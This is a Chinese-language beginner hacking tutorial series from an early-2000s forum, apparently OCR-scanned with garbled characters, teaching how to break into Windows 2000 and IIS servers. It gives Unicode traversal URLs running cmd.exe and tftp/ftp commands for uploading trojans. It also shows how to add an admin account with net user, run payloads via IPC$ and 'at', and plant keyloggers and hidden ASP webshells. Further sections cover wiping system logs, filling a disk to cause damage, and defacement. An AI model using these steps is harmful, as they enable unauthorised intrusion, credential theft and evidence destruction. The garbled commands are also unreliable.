基础知识 黑客

基础知识（上）

我认为这是一套适合初学者由浅到深的文章，所以强烈推荐给大家，作者从基础讲到最近比较火的漏洞，可

能有些人看来是浅了些，但是的确很适合想干点啥但又不知道怎么办的菜鸟们.

第一节，伸展运动。这节操我们要准备道具，俗话说：“工欲善其事，必先利其器”（是这样吗？哎！文化

低……）说得有道理，我们要学习黑客技术，一点必要的工具必不可少。

1，一台属于自己的可以上网的电脑。这样你可以有充分的支配权，上网不用说，否则你怎么看到我的文章？

wap?呵呵！属于自己很重要，否则安全性是个很大的问题。第一点相信大家没有问题。

2,windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的！（当然，我也是铁杆gamefan）对网络支

持极差，命令受限制，很多软件又不能用，对黑客来说使用起来绊手绊脚，非常不利。这里我推荐2000,这

是一个很成熟的系统（漏洞还是有一堆）。推荐双系统，这样黑玩搭配，干活不累。

3,冰河。中国第一木马，中者数不胜数，国人骄傲。虽然用冰河根本不能算黑客，但它确实能培养你对黑客

的兴趣，同时帮助你了解网络，相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错，大家仔

细看看。而且，以后你学会入侵服务器后，用冰河操作也会减少工作量（我是懒虫，爽！）

4,oicqo我们学黑客，可不是学泡mm!bfctx你息怒息怒！我们当然是学黑客，但不要忘了，众人

拾柴火更高，我们通过cshu的成员列表，互相联系帮助，对提高水平很有帮助！另外我要废话一句：据我了

解，现在黑客网站下载最多的都是针对oicq的破解工具，我个人认为很无聊，偷个密码代表什么，浪费时间!

最后补充：皿不能不泡。（谁砸我？？！！）

5,superscano很好用的端口扫描器，速度超快，功能一流，一旦拥有，别无所求……（打住！）不论是找

木马受害者，还是扫服务器端口，它都非常有效，cshu强烈推荐！

6,一本笔记本/便条，网上资料相当多，黑客处理的也是非常之多。良好的习惯决定了你的效率，准备一本

笔记本，记录下你的成果，肉鸡，木马利用，命令，密码……坚持一下，你会发现你的效率大幅上升的！

7,lc3.著名nt/2000sam破解程序，有时我们拿不到足够权限，又没好办法，那么lc3是最好的解决办法，只

要你拿的到sam,你就是服务器它爷爷！本站有其破解程序，支持了暴力破解！

8,程序合并。这是玩木马必需的，虽然木马是很低的手段，但有时配合巧办法（以后我会介绍）确实能够达

到意想不到的效果，朋友们可以在空闲时玩玩木马，很有趣，若你能巧妙的骗过mm,那么webmaster也可能被

你骗倒：〉（比较理想化）

9,流光4for2000/nt。可能是世界上最好的综合类黑软！中国的骄傲，它集成了很全的漏洞信息，速度快，

方法多，对有漏洞的主机是毁灭性的打击，操作乂方便，是快速黑站必不可少的精品工具。超级吐血推荐！！

10,良好的心态，稳定的情绪，刻苦估研的精神，刨根问底的作风，打扫房间的习惯。黑客是门很高深的学

问，不要幻想一步登天，失败是常有的事，千万不可灰心。在那么多黑软的包围下，切不可完全依赖他们，

一定要了解它们利用什么原理工作。对任何一个小问题，小细节，一定要问清楚，cshu就是给大家互相交流

的场所哦！黑完后不要得意忘形，打扫战场也很重要，以防万一。

第一节操完，可能很无聊，我就这点水平，大家见谅！这里我说一句大话：做完菜鸟操，包你会黑简单的站

（哎哟！心慌了！）

下一节操我们要介绍如何掌握一台主机的基本信息，期待中……

真是太对不起大家了，隔了那么久才写这篇教程，我这几天实在太忙，大家还是体谅一下我吧，好了，开始

做操。

今天的内容足获得主机的信息。我们要黑一台主机，首先要了解它的信息，包括它的类型，用户列表，目录,

端口，漏洞等等。

首先我们我们要找一台主机来练手，随便挑吧！www.flyingfish.com（乱说的）

第一部，呵呵，先在ie里看看吧，mmmm…..做的还行，挺精致的！主要是我们肯定了它现在是正常的。然后,

我们应该知道它的ip,很简单，ping它一不就可以了。

pingwww.flyingfish.com,看看窗口里有了什么？是不是有三行回应,其中的111.111.222.222就是ip了

（还是胡说的，一个例子）。有人是不是要问，我这里怎么没有。那可能是两个原因，第一，你打错命令了；

第二，该主机装了防火墙，禁止ping,不过这种可能很小。

知道了ip，下一步应该确定端口了。下面是一些常用的端口的默认值

21—ftp重要哦

23—telnet欢呼吧

25-smtp尽管重要，但似乎没什么叫利用的

53-domain同上

79—finger可知道用户信息了

80—http要看网页，没它不行吧

110—pop收信的

139—netbics共享用的，很有利用价值哦

3389—win2000超级终端呵呵，这个好！

其实端口有上千种，这些最最常用

我们怎么知道服务器有什么端口打开呢？？去找个扫描器吧，x-scan,superscan,flux等等很多哦。这里我

推荐superscan,速度很快，本站也有其教程哦！用法还是比较傻瓜的，估计大家不会有问题，轻轻几点，

打开的端口就出现了。不错不错，上面说到的都有（太理想化了吧！）

那么我们该如何应对呢？

ps:忘了说一声，顺便扫一下7626,冰河有也说不准哦：）

若有ftp,那就用用匿名登陆。自己动手也行，最好用x-scanflux等吧！反正，有ftp就有一份希望

telnet在！好！telnet111.111.222.222,出现窗口了吧！嗯？要密码？看来网管还不是超级注意文明用语：）

随便猜个，错了，闪人！

smtp,看着它，无奈

domain,一般它带了局域网了

finger可以知道用户列表了，不好，忘了用法了，幸好finger很少出现

80肯定在，我们等会来对付它

110有smtp,pop在也不奇怪了

139找个扫描器来找找有没有露在外面的共享吧，日后也用得着

3389太太太好了！！打开客户端吧，用输入法漏洞试试，成了就干了它！不成也没事，我们以后完全控制它

3389会很方便的。

端口扫完了！我们在多了解它一点吧！追捕大家都知道吧，其实用它获取主机信息也不赖哦。打开追捕，输

入ip,选择智能追捕，是不是有很多信息出来了？虽然不能直接利用，但毕竟我们有对它有了进一步的了解。

掌握了那么多信息，我们该做点什么了，一般黑客入侵都是靠着系统漏洞，不会都傻傻地去暴力破解的。我

们现在就要看看它有引么漏洞。

对漏洞大家可能不太了解，我这里也不能一一说明了，太多了，感兴趣的话去论坛找freedom吧！

目前广泛利用和存在的漏洞有:unicode,unicode后续，iis溢出，.用q,.frontpageextend,输入法漏洞等等

大漏洞。至于如何确定，呵呵，绝对不会是一行一行地在ie中试吧，拿出x-scan吧，很好的扫描器哦！

稍微设置一下就上路吧！过了一会，呵呵，报告出来了，快看，哇！漏洞一大堆！这下赚了！各条漏洞都有

详细的信息，大家看吧，总比我说的准了。

现在这台主机已经和我们成为亲戚了，要让这位亲爱的亲戚做点事，就要开始各种攻击了，下回我们就探讨

一下最最可爱的unicode漏洞，各位可能就会在unicode中完成第一次黑客体验

基础知识（中）

上传，这个我们后面介绍。

几点忠告：

1,对于没有主页的机器（就是正在建立的主页），不要改它，这很没水准，也很没道德

2,echo前记得帮他们做好备份

3,不准在主页里加入恶性语句

2,下载文件

要是有什么有用的文件被你发现，那我们如何下载呢？

最简单的方法：把文件copy至网页目录下。copyc:\email\baby.emlc:\inetpub\wwwroot\baby.zip,然后，

下载H.ll.22.22/baby.zip就行了，注意！实际应用中要记得对文件名进行修改，总之不能暴露。

别的方法：对不起，没想好：）

3,最重要的上传

一般方法：ftp法

首先建一个ftp脚本文件：c:\hehe.haha（名字乱取把），申请一个ftp账号，然后用echo吧

echo+openftp.eshu.com（ftp主机）>c:\hehe.haha

echo+useryourname>>cc:\hehe.haha（yourname是用户名）

echo+yourpasswd>>c:\hche.haha（yourpasswd是密码）

echo+getsetup.exe»c:\hehe.haha要下载的文件

echo+quit»c:\hehe.haha

完了以后:ftp+/s:c:\hehe.haha,由于是ftp主机,那么速度•定很快，过•会setup.exe就会出现在当前目

录了（也就是emd所在目录）

别忘了先上传到ftp主机，不要做马大哈哦!

最简单的方法：tftp法。

这种方法不用中转服务器，首先准备一个tftp服务端，它的作用就是把你的机器做成一个tftp服务器，利用

漏洞机器来下载（注意，运行tftp时不要运行其他的ftp软件）

在这里我推荐ciscotftpserver,自己去找找把，实在没有来找我：）

安装好后运行，别忘了设置好默认目录，否则会找不到文件

tftp命令：tftp-i1.2.3.4GETihateu.exec:\winnt\ihateu.exe（ihateu.exe在默认目录里）

1.2.3.4为你的ip,用Unicode运行一下，会看到tftpserver里有反应了，这就好了，不一会，文件就传上去

了，方便把！

学会了上传，我们就可以好好改主页，还可以上传木马，还可以把程序放上去运行（运行程序和在d

os里一样）

4,如何清除痕迹

虽然国内主机纪录ip的不是很多，但万事小心为妙，unicode权限达不到admin。用cleaniislog行不通，

就宜接删吧！

C:\winnt\system32\logfiles\*.*

C:\winnt\ssytem32\config\*.evt

C:\winnt\system32\dtclog\*.*

C:\winnt\system32\*.log

C:\winnt\system32\*.txt

C:\winnt\*.txt

C:\winnt\*.log

全……擦掉！

四，细节问题。

1,遇到长文件名怎么办？

c:\programfiles\

就用。：、1*0红2成0%门及5”\

2,遇到空格怎么办？

%代替喽,或者XXyy=xxyy~l

基础知识（5）

%代替喽,或者xxyy=xxyy'l

3,如何做个很大的文件？

目的就是破坏啦！我不喜欢不过教教你们啦

©echooff

echobig>c:\a.a

:h

copyc:\a.a+c:\a.ac:\a.a

gotoh

注意不要乱来啊！

4,输入命令，没反应或反应不对v

：）请检查检查再检查命令的正确性，可能没有漏洞，那就闪人！看在你看到这里那么给我面子的份上，在

给你几个吧！

http://wu-u\exsample,com/scripts/•••macr;..a

"./winnt/systcm32/cmd.cxc?/c+dir+c:\或http:〃www.cxsamplc.com/msadc/..•••2/cmd.exe?/c+dir

+c:\或http://www.exsample.com/_vti_bin…2/cmd.exe?/c+dir+c:\或http://\mv.exsample.com/_me

m_bin…2/cmd.exe?/c+dir+c:\

不一定有用哦！

5,如何找到Unicode漏洞的主机

呵呵：）最好的方法自然是个一个ping,一个一个试喽：）

不要打我呀！我说我说。最好找一个cgi扫描器，unicode查找器多如之毛，随便找个吧！

6,我copy,del文件,怎么显示aceessdenined?

这个不好办了，由于Unicode所拥有的权限有限，出现上述情况很正常，我们要做的便是提高自己的权限！

这个我会在今后介绍，现在你可以试试attrib

attrib-r-h-sc:\autoexec.bat

再对autoexec,bat进行操作，看看有没有效果，成功率不高，不好意思！

7,我黑了主页，天下无敌？

我本来想对你说：“见你的鬼去吧！”不过想想不大礼貌，有失我绅二风度，所以改个口

echo主页或改主页在不懂黑客的人看起来很了不起，不过，它最多算是一个基础，拿到admin才是我们的终极

目标！

对eshu全体成员来说，不准去改正在建立的网页！这是我们的原则！

要是你想耍耍威风，那也可以理解，那就去黑外国的，或者url欺骗也是个好选择

8,我如何做更多的事？

第一，努力提高权限

第二，由于emd的限制，我们可以做的不多，那就要程序帮忙，上传吧！切记，要隐秘！

一，frontpage扩展攻击。

为什么把它放第一位呢？原因很简单，它最最方便，frontpage服务器扩展是一种方便的远程站点管理功能，

可是由于某些网管注意文明用语的疏忽（为什么注意文明川语满街飞？）不设置访问密码，如果那样的话，

我们只要用一个frontpage就可以黑它了！！这完全不是黑客工具，但它确实办到了，还要感谢注意文明用语

网管和微软啊！

具体做法:

1,准备frontpage,我是用dreamweaver的，但它不能黑啊：）最好是2000版，只是不要是老掉牙的版本就行

了。

2,找一台有frontpage扩展的主机，可以用流光，也可以用搜索引擎查找/_vti_pvt/,这是frontpage扩展的

木小志O

3,接下来打开frontpage,（妈妈：你在干什么？回答：做网页！妈妈：好孩子！）文件菜单下选择“打开站

点”，然后在文件夹框里写入http://ll.ll.22.22（我习惯用这个做例子

基础知识（下）

netuseriusrmachinenameeshu（把它的密码设为eshu）

netlocalgroupadministratorsiusr_machinename/add（力口入adminislralors组）

这样我们就拥有了iusrjnachinename这一账号，admin权限，简单吧！

熟悉一下notuse命令：

netuse\11.11.22.22\ipc$“eshu"/user:iusr_machinename建立连接

copyc:\haha.exe\11.11.22.22\admin$把haha.exe复制到机器c:\wirmt\system32上,若是c$.d$，就表示

c,d盘

nettime\11.11.22.22看到了时间了,比如是8点

at\11.11.22.228:03haha.exe就会在8点3分执行。

netuse\11.11.22.22/delete断开连接

应该是很简单的。这样我们就可以随心所欲地操作11.11.22.22了，admin是最高权限，所以没有限制的：）

是不是很简单？所以我是溢出是很厉害的攻击方法。

3389知道吧！如果能进入，那么用上面的命令也可以轻易拿到admin的，不过呢，有3389漏洞的机器已经不多

了。看你运气了！（本站有几篇关于3389的好文章）

总的来说，还是Unicode的机器最多，为什么注意文明用语网管不会灭绝呢：）虽然unicode拿admin有一定难

度，但还是要试试的。

首先，我们检查一下unicode在这台机器上的权限，一般看读写权限和运行权限。用copy或del命令便可确定

读写权限，然后.上传文件运行一下便可知道运行权限。

1,如果我们可以对winnt\repair和winnt\eonfig进行访问，sam文件就在里面（win2k里是sam,nt4里是sam.

_）那么用tftp把get改成put下载下来，或者把它复制到inetpub\wwwroot下，改成zip下载。

拿到sam后，用lc3破解版暴力破解吧，这种方法比较费时。

2,要是有运行权限，拿就抛个木马上去吧！虽说木马可能也会没有权限，但自启动的模式在admin登陆后可

能会自己提升了权限。要注意的是，最好放最新的木马，因为木马很容易被杀毒软件查杀！

3,其实和2差不多，只不过变成了键盘记录器，选个国产的，一般杀毒软件不会杀出来，认真配置好后传上

去，下线睡觉或是做家务去！等到网管序了机器，密码就会被纪录下来，我们在去取，admin就顺利到手了：）

4,geladmin和pipeupadmin,前者是nl4用的，后者是2000。看看帮助知道使用方法后（其实猜都猜得到）就

可以提升一个用户的权限，有一步登天的感觉！

5,手工做个bat文件，里面是建立用户等命令，然后把它放到自启动下，有很多途径：documentsandsetti

ngs下的开始菜单下的启动，知道了吧，至于要顺利放进去的话，会遇到空格长名等等问题，就看你的基本功

了。win.ini里有load,加进去。还有便是注册表，好好研究一下regedit.

6,本地溢出。这个比较高深，我能告诉大家的只是，去四处找找本地溢出程序。

总的来说，unicode改主页是非常简单的，但是若是要取得更高的权限，就要一番努力，上面的方法只是些思

路，实际操作时需要具体处理，开动脑筋，把方法都结合起来。（是穴是听起来有点玄？）

想想好像没有什么其他的途径要说了，什么？linux,呵呵，我还不大懂，就不在这里瞎说了。

那今天就说到这里了，6里面我会说说后门制作，小问题和我的一点经验。期待吧！

这是最后一节了，写的傻傻的，但我毕竟坚持下来了，值得鼓励！（偶尔阿q一下）在写菜鸟操的同时.，我们

的cshu（cshu.51.net）也在默默成长，但现在我要准备离开了，真是有点舍不得。在今后的日子里，还请大家

多多支持cshu和christ,freedom他们。

今天说点什么呢？没有主题，乱谈一通吧！

首先我要吐一次血，当然是为了推荐一样东西，就是流光！（那么没创意，老土！）不管怎么说，小榕的流

光应该是中国第一黑软，他综合了诸多的攻击手段，使攻击便捷化，当然可能让我们养成了懒惰的习惯。不

会用流光的最好去学学。

我来说说我自己觉得最有用的几个项目：

1,探测--扫描pop3/ftp/nt/sql主机，要是无目的地黑，那么用这个再合适不过了。进去后填好ip范围（范

围可以扫大-•点，它很快的），至于类型嘛,要是你要“大堆unicode,那么选择iis/frontpage再合适不过

了，要是要更高的权限，sql是不错的选择。完成后，表格里会多出一大堆东西。

remoteexecutex这是几种不同的unicode,用它比用ie来执行方便多了,但是echo有问题（是我自己不会,

会的朋友快教我）

remoteftppcawfilemethod-x这是远程获取pcanywhere的密码文件，要使用的话，你首先要有一个ftp

账号，去申请吧！顺利拿到cif文件后，用流光自带的工具就可以解开密码，很爽的！

remoteftpsam-x拿sam的,还是用最好的lc3来解吧!

frontpageextended这是frontpage扩展，不过不要高兴，是要密码的。但是若是后面跟了privilegehole

的话，放声大笑吧！（小心不要让邻居拿着菜刀冲进来）打开frontpage,打开站点，http:〃ip就可以了！

（http:〃不要忘）

此外还有一点变通，大家肯定读的懂的。

2,探测--高级扫描工具。这可是流光4中的重头戏，综合了很多漏洞，还可以用plugin功能加入新的漏洞。

这项功能很适合对某一站点进行探测，很快扫出漏洞后，流光会生成一个报告文件，其中包含漏洞的连接，

要是你看不懂的话，建议你拿出x-scan,里面有漏洞描述的。

3,工具--减管道远程命令，种植者，这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号，相

信在此之前你应该有几个了吧，那就快点试试吧！

总的来说，流光的使用是非常简单的，其中也有不少工具值得我们一月，tools目录里有一些很好的工具，ex

ploit里则有很多溢出攻击程序，前提是你应该会c,不会的话我也没办法，学会c起码要看10倍于菜鸟操的资

料吧！另外给大家推荐一个站点：\v\vw.hack.co.za,有什么漏洞的话就去那里找找，你会有所收获的。

然后我想说说一些黑站的经验。

☆当我们用Unicode控制一台机器时，我向大家推荐用asp木马，阿新的改良版，本站有下载的。上传asp文件

前不要忘了修改list.asp中的地址信息，最好也放一个cmd.asp上去，运气好的话，可以运行命令的。

上传好后，i。里输入其中index,asp的地址，呵呵，我们就能方便地管理其中的文件了，可以改网页，改代码,

上传脚本文件麻烦？那就用它来生成吧！

推荐他的最大原因便是--便于隐藏！一般网站总有一个庞大的目录，选择一个深的，放进去，网管很难发现

的：）

最后对大家说一句，耍是有备份目录（很多网站都有的），最好也放一份进去。有一次我用这个东西修改一

家网站的首页，改了两三次网管也没删掉，可是突然一天不行了，原呆他用了备份的网页（还算机灵吧）

☆我想对大家说，对于国内网站，最好不要恶意去攻击，因为我们是中国人嘛！在5/1期间，我发现有一些国

内站点被黑，留下的页面上不是poisonbox,而是中国人的话，这真是无耻到了极点！！！！大家千万不要

学哦.还有,现在网卜有很多坏没有网页的主机.件件有很多漏洞,对干这种机器，竟有一曲小人也会夫改

收页（比如上海那个姓杨的小子）这算什么？显示实力，炫耀技术？呵呵，见鬼去吧！

我的建议是，不要改它的首页，而是努力去拿admin,